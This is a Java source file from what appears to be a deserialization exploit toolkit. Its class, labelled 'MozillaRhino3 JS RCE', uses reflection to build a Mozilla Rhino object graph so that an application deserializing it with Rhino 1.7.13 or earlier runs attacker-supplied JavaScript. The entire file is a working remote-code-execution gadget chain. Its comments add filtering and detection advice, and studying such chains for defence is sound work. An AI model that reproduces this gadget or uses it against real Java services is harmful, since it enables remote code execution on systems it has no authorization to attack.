package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.Reflections;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.Hashtable;
import org.mozilla.javascript.Callable;
import org.mozilla.javascript.ClassCache;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.ErrorReporter;
import org.mozilla.javascript.Evaluator;
import org.mozilla.javascript.IdScriptableObject;
import org.mozilla.javascript.Interpreter;
import org.mozilla.javascript.LazilyLoadedCtor;
import org.mozilla.javascript.NativeJavaObject;
import org.mozilla.javascript.Script;
import org.mozilla.javascript.Scriptable;
import org.mozilla.javascript.ScriptableObject;
import org.mozilla.javascript.tools.shell.Environment;

/**
 * Gadget that assembles a Mozilla Rhino object graph around a caller-supplied
 * JavaScript source string and returns it for Java-native serialization.
 *
 * <p>The graph is rooted in a {@link NativeJavaObject} whose private fields are
 * set through reflection; the script itself is compiled here, with Rhino's
 * {@link Interpreter}, and stored inside the graph as a property accessor.
 *
 * <p>Defensive reading: the resulting stream is only meaningful to an application
 * that passes untrusted bytes to {@code ObjectInputStream.readObject()} while
 * Rhino is on its classpath (the annotation below lists {@code rhino:js <= 1.7.13}).
 * Streams produced from this graph carry {@code org.mozilla.javascript.*} class
 * descriptors (e.g. {@code NativeJavaObject}, {@code tools.shell.Environment}),
 * so a deserialization filter ({@code java.io.ObjectInputFilter}) that rejects
 * that package, or an allow-list that never includes it, blocks the graph before
 * any Rhino code runs. Matching on those class names in captured serialized
 * traffic is a workable detection signal.
 */
@GadgetAnnotation(name = "MozillaRhino3 JS RCE", dependencies = {"rhino:js <= 1.7.13"}, authors = {Authors.TINT0})
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.Js_Expr})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/other/MozillaRhino3.class */
public class MozillaRhino3 implements Gadget {
    /**
     * Framework entry point: asks the next element of the chain for its output and
     * wraps it with {@link #getObject(String)}.
     *
     * @param gadgetContext context handed through to the next chain element
     * @param gadgetChain   chain whose {@code doCreate} result is cast to {@code String}
     *                      (presumably a JavaScript expression, per {@code nextTags = Js_Expr} — confirm)
     * @return the object graph built by {@link #getObject(String)}
     * @throws Exception on any reflection or compilation failure; also a
     *                   {@code ClassCastException} if the chain result is not a {@code String}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((String) gadgetChain.doCreate(gadgetContext));
    }

    /**
     * Builds the Rhino object graph for the given JavaScript source.
     *
     * <p>Nearly every step goes through reflection on non-public Rhino members, and
     * several steps carry fallbacks for members whose shape differs between Rhino
     * releases. Statement order matters: later steps consume objects created earlier.
     *
     * <p>NOTE(review): {@code Context.enter()} is called here and no matching
     * {@code Context.exit()} is visible in this method, so the Rhino context stays
     * associated with the calling thread after return.
     *
     * @param str JavaScript source text; it is compiled in this method, so a syntax
     *            error surfaces here rather than later
     * @return a {@link NativeJavaObject} with its private fields populated as described inline
     * @throws Exception if a class, constructor, method or field looked up by name is
     *                   missing in the Rhino version on the classpath, or compilation fails
     */
    public Object getObject(String str) throws Exception {
        // NativeError is looked up by name and instantiated through its no-arg
        // declared constructor after forcing accessibility.
        Constructor<?> declaredConstructor = Class.forName("org.mozilla.javascript.NativeError").getDeclaredConstructor(new Class[0]);
        Reflections.setAccessible(declaredConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) declaredConstructor.newInstance(new Object[0]);
        // First scope object: its "associatedValues" table is replaced with one holding
        // a ClassCache that was allocated without running any constructor.
        Environment environment = new Environment();
        Hashtable hashtable = new Hashtable();
        hashtable.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
        Reflections.setFieldValue(environment, "associatedValues", hashtable);
        Context enter = Context.enter();
        // MemberBox (non-public) wrapping the public static Context.enter() method;
        // installed further down as the getter of the "getName" slot.
        Object createWithConstructor = Reflections.createWithConstructor(Class.forName("org.mozilla.javascript.MemberBox"), Class.forName("org.mozilla.javascript.MemberBox"), new Class[]{Method.class}, new Object[]{Context.class.getMethod("enter", new Class[0])});
        // Second scope object: gets a regularly constructed ClassCache and becomes the
        // parent scope of the compiled script.
        Environment environment2 = new Environment();
        new ClassCache().associate(environment2);
        // Registers a lazily loaded "java" property backed by NativeJavaTopPackage on
        // environment2. Two constructor arities are tried (5 args, then 4).
        // NOTE(review): getDeclaredConstructors() does not guarantee any ordering, so
        // selecting by index [1]/[0] depends on JVM behaviour; if the wrong constructor
        // is picked, newInstance fails with IllegalArgumentException, which is not caught.
        try {
            Constructor<?> constructor = LazilyLoadedCtor.class.getDeclaredConstructors()[1];
            constructor.setAccessible(true);
            constructor.newInstance(environment2, "java", "org.mozilla.javascript.NativeJavaTopPackage", false, true);
        } catch (ArrayIndexOutOfBoundsException e) {
            // Only one constructor is declared: use the 4-argument form.
            Constructor<?> constructor2 = LazilyLoadedCtor.class.getDeclaredConstructors()[0];
            constructor2.setAccessible(true);
            constructor2.newInstance(environment2, "java", "org.mozilla.javascript.NativeJavaTopPackage", false);
        }
        // Compile the supplied source through the non-public Context.compileString,
        // passing an Interpreter as the Evaluator, "test" as the source name and 0 as
        // the line number.
        Interpreter interpreter = new Interpreter();
        Method declaredMethod = Context.class.getDeclaredMethod("compileString", String.class, Evaluator.class, ErrorReporter.class, String.class, Integer.TYPE, Object.class);
        declaredMethod.setAccessible(true);
        Script script = (Script) declaredMethod.invoke(enter, str, interpreter, null, "test", 0, null);
        // Wrap the compiled Script in a NativeScript and parent it to environment2.
        Constructor<?> constructor3 = Class.forName("org.mozilla.javascript.NativeScript").getDeclaredConstructors()[0];
        constructor3.setAccessible(true);
        Object newInstance = constructor3.newInstance(script);
        ScriptableObject.class.getDeclaredMethod("setParentScope", Scriptable.class).invoke(newInstance, environment2);
        // Obtain the "getName" slot on the NativeError instance and overwrite its
        // "getter" field with the MemberBox. Three API shapes are tried in turn:
        //   1. findAttributeSlot(String, int, SlotAccess) with enum constant index 3
        //   2. findAttributeSlot(String, int, int) with mode 4
        //   3. createSlot(Object, int, int) with mode 4
        // Index 3 / value 4 is presumably the getter-setter access mode — confirm
        // against the targeted Rhino release.
        try {
            Method declaredMethod2 = ScriptableObject.class.getDeclaredMethod("findAttributeSlot", String.class, Integer.TYPE, Class.forName("org.mozilla.javascript.ScriptableObject$SlotAccess"));
            Object obj = Class.forName("org.mozilla.javascript.ScriptableObject$SlotAccess").getEnumConstants()[3];
            Reflections.setAccessible(declaredMethod2);
            Reflections.setFieldValue(declaredMethod2.invoke(idScriptableObject, "getName", 0, obj), "getter", createWithConstructor);
        } catch (ClassNotFoundException e2) {
            // SlotAccess enum does not exist in this Rhino version: fall back to int modes.
            try {
                Method declaredMethod3 = ScriptableObject.class.getDeclaredMethod("findAttributeSlot", String.class, Integer.TYPE, Integer.TYPE);
                Reflections.setAccessible(declaredMethod3);
                Reflections.setFieldValue(declaredMethod3.invoke(idScriptableObject, "getName", 0, 4), "getter", createWithConstructor);
            } catch (NoSuchMethodException e3) {
                Method declaredMethod4 = ScriptableObject.class.getDeclaredMethod("createSlot", Object.class, Integer.TYPE, Integer.TYPE);
                Reflections.setAccessible(declaredMethod4);
                Reflections.setFieldValue(declaredMethod4.invoke(idScriptableObject, "getName", 0, 4), "getter", createWithConstructor);
            }
        }
        // The compiled script is registered as the getter (last argument false) of a
        // "directory" property on the same object.
        idScriptableObject.setGetterOrSetter("directory", 0, (Callable) newInstance, false);
        // Root object: private fields are written directly, bypassing the public API.
        // "adapter_writeAdapterObject" is pointed at customWriteAdapterObject below,
        // presumably so that serialization of this object calls it — confirm against
        // NativeJavaObject's serialization code.
        NativeJavaObject nativeJavaObject = new NativeJavaObject();
        Reflections.setFieldValue(nativeJavaObject, "parent", environment);
        Reflections.setFieldValue(nativeJavaObject, "isAdapter", true);
        Reflections.setFieldValue(nativeJavaObject, "adapter_writeAdapterObject", getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
        Reflections.setFieldValue(nativeJavaObject, "javaObject", idScriptableObject);
        return nativeJavaObject;
    }

    /**
     * Writes three objects to the stream in a fixed order: the string
     * {@code "java.lang.Object"}, an empty {@code String[]}, and {@code obj}.
     *
     * <p>Kept {@code public static} because {@link #getObject(String)} resolves it with
     * {@code getClass().getMethod(...)}, which only finds public methods, and stores
     * the resulting {@link Method} in the root object's
     * {@code adapter_writeAdapterObject} field.
     *
     * @param obj                object written last
     * @param objectOutputStream destination stream
     * @throws IOException if any of the three writes fails
     */
    public static void customWriteAdapterObject(Object obj, ObjectOutputStream objectOutputStream) throws IOException {
        objectOutputStream.writeObject("java.lang.Object");
        objectOutputStream.writeObject(new String[0]);
        objectOutputStream.writeObject(obj);
    }
}
